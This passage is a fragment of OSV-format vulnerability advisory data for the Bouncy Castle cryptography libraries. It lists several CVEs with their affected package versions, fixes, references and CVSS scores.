"https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:51:36Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r97x-3g8f-gx3m", "published": "2018-10-17T16:23:50Z", "modified": "2025-09-12T20:11:40.283362Z", "aliases": [ "CVE-2016-1000340" ], "summary": "The Bouncy Castle JCE Provider carry a propagation bug", "details": "In the Bouncy Castle JCE Provider versions 1.51 to 1.55, a carry propagation bug was introduced in the implementation of squaring for several raw math classes have been fixed (org.bouncycastle.math.raw.Nat???). These classes are used by our custom elliptic curve implementations (org.bouncycastle.math.ec.custom.**), so there was the possibility of rare (in general usage) spurious calculations for elliptic curve scalar multiplications. Such errors would have been detected with high probability by the output validation for our scalar multipliers.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "versions": [ "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.51" }, { "fixed": "1.56" } ] } ], "versions": [ "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r97x-3g8f-gx3m/GHSA-r97x-3g8f-gx3m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000340" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r97x-3g8f-gx3m" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:10Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r9ch-m4fh-fc7q", "published": "2018-10-17T16:24:00Z", "modified": "2025-09-12T20:09:31.244100Z", "aliases": [ "CVE-2016-1000341" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier DSA signature generation is vulnerable to timing attack. Where timings can be closely observed for the generation of signatures, the lack of blinding in 1.55, or earlier, may allow an attacker to gain information about the signature's k value and ultimately the private value as well.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-r9ch-m4fh-fc7q/GHSA-r9ch-m4fh-fc7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000341" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/acaac81f96fec91ab45bd0412beaf9c3acd8defa#diff-e75226a9ca49217a7276b29242ec59ce" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-r9ch-m4fh-fc7q" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:15Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrvx-pwf8-p59p", "published": "2018-10-17T16:24:22Z", "modified": "2025-09-12T20:11:26.404347Z", "aliases": [ "CVE-2016-1000343" ], "summary": "In Bouncy Castle JCE Provider the DSA key pair generator generates a weak private key if used with default values", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair generator generates a weak private key if used with default values. If the JCA key pair generator is not explicitly initialised with DSA parameters, 1.55 and earlier generates a private value assuming a 1024 bit key size. In earlier releases this can be dealt with by explicitly passing parameters to the key pair generator.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rrvx-pwf8-p59p/GHSA-rrvx-pwf8-p59p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000343" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389#diff-5578e61500abb2b87b300d3114bdfd7d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-rrvx-pwf8-p59p" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:50Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v435-xc8x-wvr9", "published": "2024-05-14T15:32:54Z", "modified": "2024-10-22T05:28:59.209889Z", "aliases": [ "CGA-2f4h-fc34-cw83", "CGA-5mrq-75x2-g8hj", "CGA-9qv8-44xh-vf2p", "CVE-2024-30171" ], "related": [ "CGA-35r6-m6p6-xc93", "CGA-38cm-jrfp-jgjm", "CGA-3cjr-985f-7r7h", "CGA-7fm6-4c5m-gw2x", "CGA-8595-m6wp-3rgq", "CGA-9727-f845-q3xw", "CGA-9c2c-7969-vffw", "CGA-9vcm-5pxq-pvv5", "CGA-fcmx-xq2g-xppj", "CGA-g4x8-993m-grwh", "CGA-gfj5-2q78-6f2f", "CGA-h543-7w38-mv7r", "CGA-j49x-3x3f-7v84", "CGA-jjp7-6mw2-545w", "CGA-vwqh-4f8x-m5r2" ], "summary": "Bouncy Castle affected by timing side-channel for RSA key exchange (\"The Marvin Attack\")", "details": "An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.", "affected": [ { "package": { "name": "org.bouncycastle:bctls-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.19" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.10.1", "1.0.10.2", "1.0.10.3", "1.0.11", "1.0.11.1", "1.0.11.2", "1.0.11.3", "1.0.11.4", "1.0.12", "1.0.12.1", "1.0.12.2", "1.0.12.3", "1.0.13", "1.0.14", "1.0.14.1", "1.0.16", "1.0.17", "1.0.18", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.3.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "BouncyCastle.Cryptography", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle.Cryptography" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "versions": [ "2.0.0", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.3.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30171" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/commit/c984b8bfd8544dfc55dba91a02cbbbb9c580c217" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/d7d5e735abd64bf0f413f54fd9e495fc02400fb0" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/e0569dcb1dea9d421d84fc4c5c5688fe101afa2d" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9030171" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9030171" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240614-0008" }, { "type": "WEB", "url": "https://www.bouncycastle.org/latest_releases.html" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2024-05-14T20:22:03Z", "nvd_published_at": "2024-05-14T15:21:52Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w285-wf9q-5w69", "published": "2018-10-17T16:27:38Z", "modified": "2025-09-12T20:11:36.505110Z", "aliases": [ "CVE-2016-1000352" ], "summary": "In Bouncy Castle JCE Provider the ECIES implementation allowed the use of ECB mode", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the ECIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000352" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-w285-wf9q-5w69" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-326" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:59:14Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wjxj-5m7g-mg7q", "published": "2023-11-23T18:30:33Z", "modified": "2024-10-22T05:28:59.117892Z", "aliases": [ "CGA-q98p-rjg3-8jq7", "CVE-2023-33202" ], "related": [ "CGA-hq55-qp37-gwm6" ], "summary": "Bouncy Castle Denial of Service (DoS)", "details": "Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "last_known_affected_version_range": "\u003c 1.70", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.71", "1.71.1", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.71", "1.71.1", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33202" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/0c576892862ed41894f49a8f639112e8d66d229c" }, { "type": "WEB", "url": "https://bouncycastle.org" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2023-33202" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0001" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-11-24T16:54:01Z", "nvd_published_at": "2023-11-23T16:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": 